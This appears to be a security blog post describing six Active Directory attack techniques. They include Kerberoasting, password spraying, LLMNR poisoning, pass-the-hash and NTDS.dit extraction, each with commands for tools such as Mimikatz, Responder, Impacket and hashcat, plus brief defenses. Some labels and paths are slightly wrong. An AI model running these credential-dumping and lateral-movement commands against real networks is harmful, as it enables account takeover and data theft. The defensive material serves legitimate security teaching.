Active Directory Attack Methods

Listen to this Post

🐢▶️ Listen🚀

Active Directory (AD) remains a prime target for attackers due to its central role in managing identities and access in enterprise environments. Below are key attack methods used against AD, along with practical commands and techniques for both offensive and defensive security.

1. Kerberoasting

Attackers request service tickets for SPNs (Service Principal Names) and crack them offline to extract plaintext passwords.

Commands:

• Extract SPNs:

  setspn -T <DOMAIN> -Q /
  

• Request tickets & export for cracking:

  Add-Type -AssemblyName System.IdentityModel 
  New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>" 
  

• Extract tickets with Mimikatz:

  Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath "kerberoast_hashes.txt"
  

Defense:

• Use strong, complex passwords for service accounts.
• Enable Kerberos AES encryption (disable RC4).

2. Password Spraying

Attackers try common passwords across multiple accounts to avoid lockouts.

Commands:

• Using Metasploit:

  msfconsole 
  use auxiliary/scanner/smb/smb_login 
  set PASS_FILE /path/to/passwords.txt 
  set USER_FILE /path/to/users.txt 
  run 
  

• PowerShell Spraying:

  Import-Module .\Invoke-DomainPasswordSpray.ps1 
  Invoke-DomainPasswordSpray -UserList users.txt -Password "Spring2024!" -Domain <DOMAIN> 
  

Defense:

• Enforce account lockout policies.
• Monitor failed login attempts.

3. LLMNR/NBT-NS Poisoning

Attackers spoof responses to LLMNR (Local-Link Multicast Name Resolution) requests to capture hashes.

Commands:

• Using Responder:

  python Responder.py -I eth0 -wrf 
  

• Capture NTLMv2 hashes for cracking with Hashcat:

  hashcat -m 5600 hashes.txt rockyou.txt 
  

Defense:

• Disable LLMNR/NBT-NS in Group Policy.
• Use DNS-based name resolution.

4. Pass-the-Hash (PtH) with Mimikatz

Attackers use NTLM/LM hashes to authenticate without plaintext passwords.

Commands:

• Extract hashes with Mimikatz:

  sekurlsa::logonpasswords 
  

• Pass-the-Hash with Impacket:

  python psexec.py -hashes <LMHASH:NTHASH> <USER>@<TARGET> 
  

Defense:

• Enable Restricted Admin Mode for RDP.
• Use Credential Guard (Windows 10+).

5. BloodHound Reconnaissance

Attackers map AD attack paths using BloodHound.

Commands:

• Collect data with SharpHound:

  .\SharpHound.exe -c All --zipfilename ad_data 
  

• Analyze in BloodHound:

  neo4j console 
  bloodhound 
  

Defense:

• Regularly audit AD permissions.
• Remove excessive privileges.

6. NTDS.dit Extraction

Attackers dump the AD database for offline credential extraction.

Commands:

• Volume Shadow Copy (VSS) method:

  vssadmin create shadow /for=C: 
  copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit 
  

• Extract hashes with secretsdump.py:

  python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL 
  

Defense:

• Limit Domain Admin access.
• Monitor unusual file access.

What Undercode Say

Active Directory attacks remain prevalent due to misconfigurations and weak credential hygiene. Defenders must:
– Monitor logs (Event ID 4769 for Kerberoasting).
– Enforce LSA Protection (RunAsPPL).
– Disable legacy protocols (NTLM, LM).
– Use Just Enough Admin (JEA) for least privilege.

Expected Output:

Kerberoasting hashes extracted → Cracked with Hashcat. 
Password spraying detected → Account lockout enforced. 
LLMNR disabled → NBT-NS attacks mitigated. 

Relevant URLs:

• Mitre ATT&CK – Active Directory
• BloodHound Documentation
• Microsoft AD Security Best Practices

References:

Reported By: Cybersecurity News – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram